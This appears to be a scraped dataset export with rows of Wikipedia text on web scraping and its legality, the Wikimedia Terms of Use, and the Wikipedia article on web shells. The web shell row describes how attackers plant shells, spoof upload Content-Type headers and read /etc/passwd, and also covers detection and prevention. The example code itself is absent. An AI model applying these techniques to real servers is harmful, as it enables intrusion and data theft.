can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
11 | https://en.wikipedia.org/wiki/Web_scraping | https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Terms_of_Use | It may not be circumvented, eroded, or ignored by Wikimedia Foundation officers or staff nor local policies of any Wikimedia project. You are free to: Under the following conditions: With the understanding that: If you need help or you want to report a violation of these Terms of Use you can: Our Terms of Use Imagine a world in which every single human being can freely share in the sum of all knowledge. That's our commitment. Our Vision Statement Welcome to Wikimedia The Wikimedia Foundation, Inc. ("we" or "us" or "Foundation"), is a non-profit charitable organization, headquartered in San Francisco, California, United States, whose mission is to empower and engage people around the world to collect and develop content under a free license or in the public domain, and to disseminate it effectively and globally, free of charge. To support our vibrant community, we provide the essential infrastructure and organizational framework for the development of multilingual wiki projects and their editions (as explained on our Wikimedia Projects page) (hereby referred to as "Projects") and other endeavors which serve this mission. We strive to make and keep educational and informational content from the Projects available on the internet free of charge, in perpetuity. We welcome you ("you" or the "user") as a reader, or contributor of the Projects, and we encourage you to join the Wikimedia community. Before you participate, however, we ask that you please read and agree to the following Terms of Use ("Terms of Use"). These Terms of Use tell you about our public services at the Wikimedia Foundation, our relationship to you as a user, and the rights and responsibilities that guide us both. We host an incredible quantity of educational and informational content, all of which is contributed and made possible by users like yourself. Generally we do not contribute, monitor, or delete content (with rare exceptions, such as under policies like these Terms of Use, for legal compliance, or when faced with urgent threats of serious harm). This means that editorial control is in the hands of you and your fellow users who create and manage the content. The community the network of users who are constantly building and using the Projects and or their websites (hereby referred to as "Project Websites") is the principal means through which the goals of the mission are achieved. The community contributes to and helps govern our Projects and Project Websites. The community also undertakes the critical function of creating and enforcing policies for the specific Project editions (such as the different language editions for the Wikipedia Project or the Wikimedia Commons multilingual edition). You, the user, are welcome to join as a contributor, editor, or author, but you should follow the policies that govern each of the independent Project editions, including the Universal Code of Conduct (UCoC), which apply to all Project editions. The largest of our Projects is Wikipedia, but we host other Projects too, each with different objectives and work methods. Each Project edition has a team of contributors, editors or authors who work together to create and manage the content on that Project edition. You are welcome to join these teams and work with them to improve these Projects. Since we are dedicated to making content freely accessible to the public, content you contribute is made available under a free license or released in the public domain. Please be aware that you are legally responsible for all of your contributions, edits, and reuse of Wikimedia content under the laws of the United States of America and other applicable laws (which may include laws where you or the subject of your contributions are located). This means it is important that you exercise caution when posting, modifying or reusing content. In light of this responsibility, we have some rules about what you cannot do, most of which are either for your own protection or for the protection of other users like yourself. Please keep in mind that the content we host is for general informational purposes only, so if you need expert advice for a particular question (such as medical, legal, or financial issues), you should seek the help of an appropriate professional. We also include other important notices and disclaimers, so please read these Terms of Use in their entirety. For clarity, other organizations, such as local Wikimedia chapters and associations, that may share in the same mission are nevertheless legally independent and separate from the Wikimedia Foundation. Unless otherwise stated by the Foundation as an authorized party on a given Project's Website, those other organizations have no responsibility for the operations of the Project's Website or its content. The Wikimedia Foundation is dedicated to encouraging the growth, development, and distribution of free multilingual content, and to hosting the full content of these wiki-based Projects for the public free of charge. Our role is to host some of the largest collaboratively edited reference Projects in the world, which can be found here. However, we act only as a hosting service provider, maintaining the infrastructure and organizational framework. This infrastructure and framework allow our users to build the Projects by contributing and editing content themselves. They also allow our users to reuse that content. The infrastructure we maintain includes specialized technological infrastructure that enables users to programmatically interact with and reuse content on Projects (referred to as "Application Programming Interface" or "APIs"), and mobile applications. As used throughout the rest of the Terms of Use, our services consist of: The Project Websites we host, technological infrastructure that we maintain, and any technical spaces that we host for the maintenance and improvement of our Projects. Because of our unique role, there are a couple of things you should be aware of when considering our relationship to you, the Projects, and other users: We ask that you review the terms of our Privacy Policy, so that you are aware of how we collect and use your information. The Projects hosted by the Wikimedia Foundation only exist because of the vibrant community of users like you who collaborate to write, edit, and curate the content. We happily welcome your participation in this community. We encourage you to be civil and polite in your interactions with others in the community, to act in good faith, and to make edits and contributions aimed at furthering the mission of the shared Project. We ask that all users review and follow the Universal Code of Conduct ("UCoC"), which lays out requirements for collegial, civil collaboration across all Projects that we host. Certain activities, whether legal or illegal under the applicable law, may be harmful to other users and violate our rules, and some activities may also subject you to liability. Therefore, for your own protection and for that of other users, you may not engage in such activities on, or otherwise using, our Projects. These activities include: We reserve the right to exercise our enforcement discretion with respect to the provisions in section 4 of these Terms of Use. Where required, enforcement of these terms may include actions not listed in the Wikimedia Foundation Office Action Policy. If enforcement is required in new circumstances, we will make an effort within at most one (1) year to update the Office Action Policy to catalog the new type of action. Marketing Company Mediations Undisclosed editing by users receiving compensation creates an unreasonable burden on volunteer editors who investigate and enforce community policies. Therefore, for violations of this section related to undisclosed paid editing, you agree to submit to binding "Med-Arb" (a "Marketing Company Mediation") as described in section 14 of these Terms of Use. You are responsible for safeguarding your own password and other security credentials, and should never disclose them to any third party. Although you have considerable freedoms for reuse of the content on the Project Websites, it is important that, at the Wikimedia Foundation, we protect our trademark rights so that we can protect our users from fraudulent impersonators. Because of this, we ask that you please respect our trademarks. All Wikimedia Foundation trademarks belong to the Wikimedia Foundation, and any use of our trade names, trademarks, service marks, logos, or domain names must be in compliance with these Terms of Use and in compliance with our Trademark Policy. To grow the commons of free knowledge and free culture, all users contributing to the Projects or Project Websites are required to grant broad permissions to the general public to redistribute and reuse their contributions freely, so long as that use is properly attributed and the same freedom to reuse and redistribute is granted to any derivative works. In keeping with our goal of providing free information to the widest possible audience, we require that when necessary all submitted content be licensed so that it is freely reusable by anyone who may access it. You agree to the following licensing requirements: If the text content was imported from another source, it is possible that the content is licensed under a compatible CC BY-SA license but not GFDL (as described in "Importing text, above). In that case, you agree to comply with the compatible CC BY-SA license and do not have the option to relicense it under GFDL. To determine the license that applies to the content that you seek to reuse or redistribute, you should review the page footer, page history, and discussion page. In addition, please be aware that text that originated from external sources and was imported into a Project may be under a license that attaches additional attribution requirements. Users agree to indicate these additional attribution requirements clearly. Depending on the Project, such requirements may appear, for example, in a banner or other notations pointing out that some or all of the content was originally published elsewhere. Where there are such visible notations, reusers should preserve them. The Wikimedia Foundation wants to ensure that the content that we host can be reused by other users without fear of liability and that it is not infringing the proprietary rights of others. In fairness to our users, as well as to other creators and copyright holders, our policy is to respond to notices of alleged infringement that comply with the formalities of the Digital Millennium Copyright Act ("DMCA"). Pursuant to the DMCA, we will terminate, in appropriate circumstances, users and account holders of our system and network who are repeat infringers on our Projects and services. However, we also recognize that not every takedown notice is valid or in good faith. In such cases, we strongly encourage users to file counter-notifications when they appropriately believe a DMCA takedown demand is invalid or improper. For more information on what to do if you think a DMCA notice has been improperly filed, you may wish to consult the Lumen Database website. If you are the owner of content that is being improperly used on one of the Projects without your permission, you may request that the content be removed by filing a notice under the DMCA. To make such a request, please email us at legalwikimediaorg or snail mail our designated agent. Alternatively, you may make a request to our community, which often handles copyright issues faster and more effectively than the process prescribed under the DMCA. In that case, you can post a notice explaining your copyright concerns. For a non-exhaustive and non-authoritative list of the relevant processes for the different Project editions, visit the Copyright Problems page. Before filing a DMCA claim, you also have the option of sending an email to the community at infowikimediaorg. You are solely responsible for your use of any third-party websites or resources. Although the Projects and Project Websites contain links to third-party websites and resources, we do not endorse and are not responsible or liable for their availability, accuracy, or the related content, products, or services (including, without limitation, any viruses or other disabling features), nor do we have any obligation to monitor such third-party content. The community has the primary role in creating and enforcing policies applying to the different Project editions. At the Wikimedia Foundation, we rarely intervene in community decisions about policy and its enforcement. It is possible to notify us of illegal content, or content that violates our Terms of Use (including all policies and other documents incorporated by reference) for other reasons by contacting us directly. However, you can typically make a request directly to the Project's community: this may be more efficient, and is more consistent with our Projects' aim to empower the user community. Each Project will usually provide "Help" or "Contact" pages for further guidance, or specific tools for reporting issues. Alternatively if in doubt you can ask members of the community for help, by sending an email to infowikimediaorg or a more language-specific address from the Volunteer Response Team page. Please note that these mailboxes are monitored by users of the Projects, not the Foundation. As a result, they should not be threatened or issued with legal demands. If you contact the Foundation with a problem, we will typically explore whether and how existing community-led mechanisms can investigate and, where appropriate, resolve it. In an unusual case, the need may arise, or the community may ask us, to address an especially problematic user or especially problematic content because of significant Project disturbance or dangerous behavior. In such cases, we reserve the right, at our sole discretion (or where legally compelled), to: Those Foundation moderation activities may be informed or performed by software (such as traffic flood ("Denial of Service") protection). In those cases human review is normally available, upon request. In the interests of our users and the Projects, in the extreme circumstance that any individual has had their account or access blocked under this section, they are prohibited from creating or using another account on or seeking access to the same Project, unless we provide explicit permission. Without limiting the authority of the community, the Foundation itself will not ban a user from editing or contributing or block a user's account or access solely because of good faith criticism that does not result in actions otherwise violating these Terms of Use or community policies. The Wikimedia community and its members may also take action when so allowed by the community or Foundation policies applicable to the specific Project edition, including but not limited to warning, investigating, blocking, or banning users who violate those policies. You agree to comply with the final decisions of dispute resolution bodies that are established by the community for the specific Project editions (such as arbitration committees); these decisions may include sanctions as set out by the policy of the specific Project edition. Especially problematic users who have had accounts or access blocked on multiple Project editions may be subject to a ban from all of the Project editions, in accordance with the Global Ban Policy. In contrast to Board resolutions or these Terms of Use, policies established by the community, which may cover a single Project edition or multiple Projects editions (like the Global Ban Policy), may be modified by the relevant community according to its own procedures. The blocking of an account or access or the banning of a user under this provision shall be in accordance with Section 13 of these Terms of Use. If you believe we have not satisfactorily acted on a problematic content report, or if you have been subjected to a Foundation moderation action that you wish to challenge, you may be able to submit an appeal. Other information about routes of appeal may also be explained to you at the time, or in Project-specific help pages. We reserve the right to suspend (temporarily, or permanently) our handling of reports or other correspondence from users or third parties, whether about allegedly illegal or otherwise problematic content or conduct, or requesting appeals against moderation actions, if such correspondence was made in bad faith, repetitive, unfounded, and or abusive. In appropriate circumstances, your email address may even be blocked on our email system(s), and you will then need to contact us at our postal address if you wish to further correspond with us during that block. For less serious cases (e.g. up to three polite emails about one or more meritless complaints), this is likely to be temporary. More frequent or more abusive communications are more likely to lead to permanent measures. The Wikimedia Foundation Board of Trustees releases official policies from time to time. Some of these policies may be mandatory for a particular Project or Project edition, and, when they are, you agree to abide by them as applicable. We make available a set of APIs, which include documentation and associated tools, to enable users to build products that promote free knowledge. By using our APIs, you agree to abide by all applicable policies governing the use of the APIs, which include but are not limited to the User-Agent Policy, the Robot Policy, and the API:Etiquette (collectively, "API Documentation"), which are incorporated into these Terms of Use by reference. Though we hope you will stay and continue to contribute to the Projects, you can stop using our services any time. In certain (hopefully unlikely) circumstances it may be necessary for either ourselves or the Wikimedia community or its members (as described in Section 10) to terminate part or all of our services, terminate these Terms of Use, block your account or access, or ban you as a user. If your account or access is blocked or otherwise terminated for any reason, your public contributions and a record of your activities on or in relation to the Projects (including any correspondence you have sent us) will be unaffected (subject to applicable policies), and you may still access our public pages for the sole purpose of reading publicly available content on the Projects. In such circumstances, however, you may not be able to access your account or settings. However, regardless of any other provision in these Terms of Use, we reserve the right to suspend or end the services at any time, with or without cause, and with or without notice. Even after your use and participation are banned, blocked or otherwise suspended, these Terms of Use will remain in effect with respect to relevant provisions, including Sections 1, 3, 4, 6, 7, 9 16, and 18. We hope that no serious disagreements arise involving you, but, in the event there is a dispute, we encourage you to seek resolution through the dispute resolution procedures or mechanisms provided by the Projects or Project editions and the Wikimedia Foundation. If you seek to file a legal claim against us, you agree to file and resolve it exclusively in a state or federal court located in San Francisco County, California. You also agree that the laws of the State of California and, to the extent applicable, the laws of the United States of America will govern these Terms of Use, as well as any legal claim that might arise between you and us (without reference to conflict of laws principles). You agree to submit to the personal jurisdiction of, and agree that venue is proper in, the courts located in San Francisco County, California, in any legal action or proceeding relating to us or these Terms of Use. To ensure that disputes are dealt with soon after they arise, you agree that regardless of any statute or law to the contrary, any claim or cause of action you might have arising out of or related to use of our services or these Terms of Use must be filed within the applicable statute of limitations or, if earlier, one (1) year after the pertinent facts underlying such claim or cause of action could have been discovered with reasonable diligence (or be forever barred). Marketing Company Mediations As described in section 4 of these Terms of Use, you agree to resolve violations of the Paid Contributions without Disclosure in a Marketing Company Mediation at the Foundation's discretion. Marketing Company Mediations are binding mediations where, at the end of either a half or full day session, any disputed items that remain unresolved will be decided by the mediator in a legally binding decision. They will be conducted in meetings by teleconference or videoconference. If an in-person meeting is required, then the Marketing Company Mediation will take place in San Francisco County, California. The parties will split all fees and expenses related to the mediation arbitration equally. You agree, as part of a Marketing Company Mediation, to cooperate with the Foundation, including by timely providing any documentation in your possession relating to your undisclosed paid editing activities including the accounts used, articles affected, and clients who purchased such services. Marketing Company Mediations are subject to and governed by the Federal Arbitration Act to the extent that the mediator becomes an arbitrator. The prevailing party shall be entitled to recover its attorneys' fees (including all fees necessary to determine the applicability of the Marketing Company Mediation and to enforce the binding result) and all costs relating to the investigation and enforcement of its rights. A party may be deemed "prevailing" even if it is not successful on every claim asserted. If for some reason the entirety of these Marketing Company Mediation requirements are found to be unenforceable, you agree to resolve any disputes as described in the beginning of this section. Highlighted for emphasis At the Wikimedia Foundation, we do our best to provide educational and informational content to a very wide audience, but your use of our services is at your sole risk. We provide these services on an "as is" and "as available" basis, and we expressly disclaim all express or implied warranties of all kinds, including but not limited to the implied warranties of merchantability, fitness for a particular purpose, and non-infringement. We make no warranty that our services will meet your requirements, be safe, secure, uninterrupted, timely, accurate, or error-free, or that your information will be secure. We are not responsible for the content, data, or actions of third parties, and you release us, our directors, officers, employees, and agents from any claims and damages, known and unknown, arising out of or in any way connected with any claim you have against any such third parties. No advice or information, whether oral or written, obtained by you from us or through or from our services creates any warranty not expressly stated in these Terms of Use. Any material downloaded or otherwise obtained through your use of our services is done at your own discretion and risk, and you will be solely responsible for any damage to your computer system or loss of data that results from the download of any such material. You agree that we have no responsibility or liability for the deletion of, or the failure to store or to transmit, any content or communication maintained by the service. We retain the right to create limits on use and storage at our sole discretion at any time with or without notice. Highlighted for emphasis Just as the Wikimedia community's input is essential for the growth and maintenance of the Projects, we believe that community input is essential for these Terms of Use to properly serve our users. It is also essential for a fair contract. Therefore, we will provide these Terms of Use, as well as any substantial future revisions of these Terms of Use, to the community for comment at least thirty (30) days before the end of the comment period. If a future proposed revision is substantial, we will provide an additional 30 days for comments after posting a translation of the proposed revision in at least three languages (selected at our discretion). The community will be encouraged to translate the proposed revision in other languages as appropriate. For changes for legal or administrative reasons, to correct an inaccurate statement, or changes in response to community comments, we will provide at least three (3) days' notice. Because it may be necessary to modify these Terms of Use from time to time, we will provide notice of such modifications and the opportunity to comment via the Project websites, and via a notification on WikimediaAnnounce-l. However, we ask that you please periodically review the most up-to-date version of these Terms of Use. Your continued use of our services after the new Terms of Use become official following the notice and review period constitutes an acceptance of these Terms of Use on your part. For the protection of the Wikimedia Foundation and other users like yourself, if you do not agree with our Terms of Use, you cannot use our services. These Terms of Use do not create an employment, agency, partnership, joint control or joint venture relationship between you and us, the Wikimedia Foundation. For the purposes of European Economic Area law, United Kingdom law, or other laws that involve a similar concept, you are not acting "under the authority of" the Foundation when you use the services. If you have not signed a separate agreement with us, these Terms of Use are the entire agreement between you and us. If there is any conflict between these Terms of Use and a signed written agreement between you and us, the signed agreement will control. You agree that we may provide you with notices, including those regarding changes to the Terms of Use, by email, regular mail, or postings on the Projects or Project Websites. If in any circumstance, we do not apply or enforce any provision of these Terms of Use, it is not a waiver of that provision. You understand that, unless otherwise agreed to in writing by us, you have no expectation of compensation for any activity, contribution, or idea that you provide to us, the community, or the Projects or Project editions. Notwithstanding any provision to the contrary in these Terms of Use, we (the Wikimedia Foundation) and you agree not to modify the applicable terms and requirements of any free license that is employed on the Projects or Project editions when such free license is authorized by these Terms of Use. These Terms of Use were written in English (U.S.). While we hope that translations of these Terms of Use are accurate, in the event of any differences in meaning between the original English version and a translation, the original English version takes precedence. If any provision or part of a provision of these Terms of Use is found unlawful, void, or unenforceable, that provision or part of the provision is deemed severable from these Terms of Use and will be enforced to the maximum extent permissible, and all other provisions of these Terms of Use will remain in full force and effect. We appreciate your taking the time to read these Terms of Use, and we are very happy to have you contributing to the Projects and using our services. Through your contributions, you are helping to build something really big not only an important collection of collaboratively edited reference Projects that provides education and information to millions who might otherwise lack access, but also a vibrant community of like-minded and engaged peers, focused on a very noble goal. These Terms of Use went into effect on June 7, 2023. Previous versions of the terms: Please note that in the event of any differences in meaning or interpretation between the original English version of this content and a translation, the original English version takes precedence. |
12 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Web_shell | A web shell is a shell-like interface that enables a web server to be remotely accessed, often for the purposes of cyberattacks. 1 A web shell is unique in that a web browser is used to interact with it. 2 3 A web shell could be programmed in any programming language that is supported on a server. Web shells are most commonly written in PHP due to the widespread usage of PHP for web applications. Though Active Server Pages, ASP.NET, Python, Perl, Ruby, and Unix shell scripts are also used. 1 2 3 Using network monitoring tools, an attacker can find vulnerabilities that can potentially allow delivery of a web shell. These vulnerabilities are often present in applications that are run on a web server. 2 An attacker can use a web shell to issue shell commands, perform privilege escalation on the web server, and the ability to upload, delete, download, and execute files to and from the web server. 2 Web shells are used in attacks mostly because they are multi-purpose and difficult to detect. 4 They are commonly used for: Web shells give hackers the ability to steal information, corrupt data, and upload malwares that are more damaging to a system. The issue increasingly escalates when hackers employ compromised servers to infiltrate a system and jeopardize additional machines. Web shells are also a way that malicious individuals target a variety of industries, including government, financial, and defense through cyber espionage. One of the very well known web shells used in this manner is known as “China Chopper. 6 Web shells are installed through vulnerabilities in web application or weak server security configuration including the following: 2 4 An attacker may also modify (spoof) the Content-Type header to be sent by the attacker in a file upload to bypass improper file validation (validation using MIME type sent by the client), which will result in a successful upload of the attacker's shell. The following is a simple example of a web shell written in PHP that executes and outputs the result of a shell command: Assuming the filename is example.php, an example that would output the contents of the etc passwd file is shown below: The above request will take the value of the x parameter of the query string, sending the following shell command: This could have been prevented if the shell functions of PHP were disabled so that arbitrary shell commands cannot be executed from PHP. A web shell is usually installed by taking advantage of vulnerabilities present in the web server's software. That is why removal of these vulnerabilities is important to avoid the potential risk of a compromised web server. The following are security measures for preventing the installation of a web shell: 2 3 Web shells can be easily modified, so it's not easy to detect web shells and antivirus software are often not able to detect web shells. 2 9 The following are common indicators that a web shell is present on a web server: 2 3 For example, a file generating suspicious traffic (e.g. a PNG file requesting with POST parameters). 2 10 11 12 Dubious logins from DMZ servers to internal sub-nets and vice versa. 2 Web shells may also contain a login form, which is often disguised as an error page. 2 13 14 15 Using web shells, adversaries can modify the .htaccess file (on servers running the Apache HTTP Server software) on web servers to redirect search engine requests to the web page with malware or spam. Often web shells detect the user-agent and the content presented to the search engine spider is different from that presented to the user's browser. To find a web shell a user-agent change of the crawler bot is usually required. Once the web shell is identified, it can be deleted easily. 2 Analyzing the web server's log could specify the exact location of the web shell. Legitimate users visitor usually have different user-agents and referers, on the other hand, a web shell is usually only visited by the attacker, therefore have very few variants of user-agent strings. 2 |
13 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&oldid=1240545829 | This is the current revision of this page, as edited by Jayme (talk contribs) at 23:25, 15 August 2024 (Typo corrected). The present address (URL) is a permanent link to this version. Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common 